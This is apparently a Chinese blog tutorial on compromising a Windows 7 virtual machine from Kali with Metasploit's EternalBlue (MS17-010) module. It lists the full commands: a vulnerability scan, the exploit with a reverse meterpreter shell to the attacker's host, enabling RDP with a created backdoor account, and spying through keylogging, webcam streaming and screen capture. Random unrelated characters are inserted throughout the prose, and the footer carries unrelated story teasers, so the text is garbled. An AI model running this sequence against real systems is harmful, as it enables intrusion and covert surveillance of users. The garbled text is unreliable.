Kali從入門(mén)到銀手鐲(三):利用Metasploit工具的Win7滲透測(cè)試

現(xiàn)在很多用戶(hù)還在使用Win7系統(tǒng),雖然我個(gè)人也非常喜歡Win7攀涵,也承認(rèn)這是一款非常經(jīng)典的系統(tǒng)铣耘。但是Win7已經(jīng)在今年1月份徹底停止了支持,也就是說(shuō)永遠(yuǎn)也不會(huì)得到安全更新和補(bǔ)丁修復(fù)了以故。這對(duì)用戶(hù)來(lái)說(shuō)是極大的危險(xiǎn)蜗细,如果有條件的話,還是請(qǐng)使用最新版的Win10怒详,并及時(shí)更新安全補(bǔ)丁炉媒,保護(hù)電腦。

今天就來(lái)看看如何利用Kali來(lái)對(duì)Win7進(jìn)行滲透棘利。這里使用的工具是大名鼎鼎的Metaspoit橱野,集成了大量漏洞滲透工具。其中自然有臭名昭著的永恒之藍(lán)工具善玫,它利用了Windows系統(tǒng)的SMB漏洞水援, 漏洞編號(hào)是MS17-010密强。具體原理其實(shí)我也不清楚,但是大家只要知道這些漏洞非常危險(xiǎn)就可以了蜗元。

準(zhǔn)備工作

準(zhǔn)備工作很簡(jiǎn)單或渤,一個(gè)Win7虛擬機(jī)和一個(gè)Kali虛擬機(jī)即可。為了讓Kali能夠成功滲透奕扣,Win7系統(tǒng)需要關(guān)閉防火墻薪鹦。

關(guān)閉防火墻

掃描漏洞

首先在Kali里啟動(dòng)Metasploit框架。

msfconsole

啟動(dòng)成功之后惯豆,應(yīng)該會(huì)進(jìn)入Metasploit工具的命令行中池磁,提示符為msf5。


Metasploit框架

然后使用掃描工具掃描ms10-010漏洞楷兽,RHOSTS填寫(xiě)Win7虛擬機(jī)的IP地址地熄。

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.229.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

注意工具的運(yùn)行結(jié)果,如果出現(xiàn)了類(lèi)似綠框中的輸出芯杀,那么就說(shuō)明漏洞掃描成功端考,可以進(jìn)行下一步的滲透工作了。如果Win7防火墻是開(kāi)啟的揭厚,是無(wú)法掃描到漏洞的却特。這也從另一個(gè)側(cè)面來(lái)證明防火墻的保護(hù)作用。

掃描結(jié)果

滲透系統(tǒng)

通過(guò)掃描證實(shí)了Win7系統(tǒng)中存在漏洞筛圆,下一步自然是通過(guò)對(duì)應(yīng)的滲透工具進(jìn)行滲透裂明。其中RHOSTS是遠(yuǎn)程IP,也就是Win7的IP地址顽染,而LHOSTS是本地Kali系統(tǒng)的IP地址漾岳。

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.229.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.229.131
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

稍等片刻轰绵,如果滲透成功粉寞,那么就會(huì)出現(xiàn)meterpreter提示符。這時(shí)候可以輸入getuid命令查看一下當(dāng)前系統(tǒng)的用戶(hù)左腔。

獲取用戶(hù)名

開(kāi)啟遠(yuǎn)程桌面

滲透成功之后唧垦,就可以使用隨心所欲的進(jìn)行各種操作了。如果想要簡(jiǎn)單一點(diǎn)液样,可以開(kāi)啟遠(yuǎn)程桌面振亮,直接控制目標(biāo)電腦。開(kāi)啟RDP的時(shí)候需要?jiǎng)?chuàng)建一個(gè)用戶(hù)鞭莽。

meterpreter > run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456

然后在Kali中打開(kāi)一個(gè)新的終端坊秸,輸入命令開(kāi)啟遠(yuǎn)程桌面。

rdesktop 192.168.229.129

然后輸入上面設(shè)置的用戶(hù)名和密碼即可連接到目標(biāo)計(jì)算機(jī)澎怒。


開(kāi)啟遠(yuǎn)程桌面

當(dāng)然褒搔,這種方法的問(wèn)題就是因?yàn)閃indows系統(tǒng)是單用戶(hù)的系統(tǒng),當(dāng)前登錄的用戶(hù)會(huì)看到遠(yuǎn)程桌面的登錄提示,從而暴露滲透者星瘾。

遠(yuǎn)程桌面連接提示

后臺(tái)監(jiān)聽(tīng)

其實(shí)如果滲透成功走孽,進(jìn)入了meterpreter提示符狀態(tài)的話,也不需要這么麻煩琳状。因?yàn)閙eterpreter自帶了很多命令磕瓷,包括上傳文件、執(zhí)行程序念逞、監(jiān)聽(tīng)鍵盤(pán)鼠標(biāo)攝像頭等等困食,完全足以獲取目標(biāo)用戶(hù)的任何信息。

screenshot命令可以獲取當(dāng)前的系統(tǒng)截圖翎承。


系統(tǒng)截圖

upload命令可以上傳文件陷舅,這里我直接把剛剛的屏幕截圖上傳上去了。上傳的目標(biāo)位置在C:\Windows\System32里审洞。

上傳文件

webcam_stream命令可以打開(kāi)目標(biāo)計(jì)算機(jī)的攝像頭莱睁。


監(jiān)控?cái)z像頭

screenshare可以實(shí)時(shí)查看用戶(hù)的當(dāng)前屏幕內(nèi)容。


查看屏幕內(nèi)容

keyscan命令可以監(jiān)聽(tīng)用戶(hù)的鍵盤(pán)操作芒澜。

監(jiān)聽(tīng)鍵盤(pán)

最后是execute命令可以執(zhí)行目標(biāo)計(jì)算機(jī)上的任意程序仰剿。


執(zhí)行程序

以上這些命令配合使用,即可完成整個(gè)滲透過(guò)程痴晦,從方方面面獲取目標(biāo)用戶(hù)的信息南吮。

當(dāng)然,通過(guò)本篇內(nèi)容誊酌,相比大家也明白了系統(tǒng)漏洞對(duì)用戶(hù)的危害有多大了吧部凑。為了盡可能的減少漏洞對(duì)我們的影響,我推薦大家永遠(yuǎn)使用最新版的操作系統(tǒng)并及時(shí)更新安全補(bǔ)丁碧浊,不要關(guān)閉更新和防火墻涂邀,安裝并確保殺毒軟件正常運(yùn)行,不運(yùn)行奇怪的程序箱锐。這樣可以很大程度上避免不法分子黑入我們的電腦比勉。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市驹止,隨后出現(xiàn)的幾起案子浩聋,更是在濱河造成了極大的恐慌,老刑警劉巖臊恋,帶你破解...
    沈念sama閱讀 218,682評(píng)論 6 507
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件衣洁,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡抖仅,警方通過(guò)查閱死者的電腦和手機(jī)坊夫,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,277評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門(mén)毙替,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人践樱,你說(shuō)我怎么就攤上這事厂画。” “怎么了拷邢?”我有些...
    開(kāi)封第一講書(shū)人閱讀 165,083評(píng)論 0 355
  • 文/不壞的土叔 我叫張陵袱院,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我瞭稼,道長(zhǎng)忽洛,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,763評(píng)論 1 295
  • 正文 為了忘掉前任环肘,我火速辦了婚禮欲虚,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘悔雹。我一直安慰自己复哆,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,785評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布腌零。 她就那樣靜靜地躺著梯找,像睡著了一般。 火紅的嫁衣襯著肌膚如雪益涧。 梳的紋絲不亂的頭發(fā)上锈锤,一...
    開(kāi)封第一講書(shū)人閱讀 51,624評(píng)論 1 305
  • 那天,我揣著相機(jī)與錄音闲询,去河邊找鬼久免。 笑死,一個(gè)胖子當(dāng)著我的面吹牛扭弧,可吹牛的內(nèi)容都是我干的阎姥。 我是一名探鬼主播,決...
    沈念sama閱讀 40,358評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼寄狼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼丁寄!你這毒婦竟也來(lái)了氨淌?” 一聲冷哼從身側(cè)響起泊愧,我...
    開(kāi)封第一講書(shū)人閱讀 39,261評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎盛正,沒(méi)想到半個(gè)月后删咱,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,722評(píng)論 1 315
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡豪筝,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,900評(píng)論 3 336
  • 正文 我和宋清朗相戀三年痰滋,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了摘能。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,030評(píng)論 1 350
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡敲街,死狀恐怖团搞,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情多艇,我是刑警寧澤逻恐,帶...
    沈念sama閱讀 35,737評(píng)論 5 346
  • 正文 年R本政府宣布,位于F島的核電站峻黍,受9級(jí)特大地震影響复隆,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜姆涩,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,360評(píng)論 3 330
  • 文/蒙蒙 一挽拂、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧骨饿,春花似錦亏栈、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,941評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至置鼻,卻和暖如春镇饮,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背箕母。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,057評(píng)論 1 270
  • 我被黑心中介騙來(lái)泰國(guó)打工储藐, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人嘶是。 一個(gè)月前我還...
    沈念sama閱讀 48,237評(píng)論 3 371
  • 正文 我出身青樓钙勃,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親聂喇。 傳聞我的和親對(duì)象是個(gè)殘疾皇子辖源,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,976評(píng)論 2 355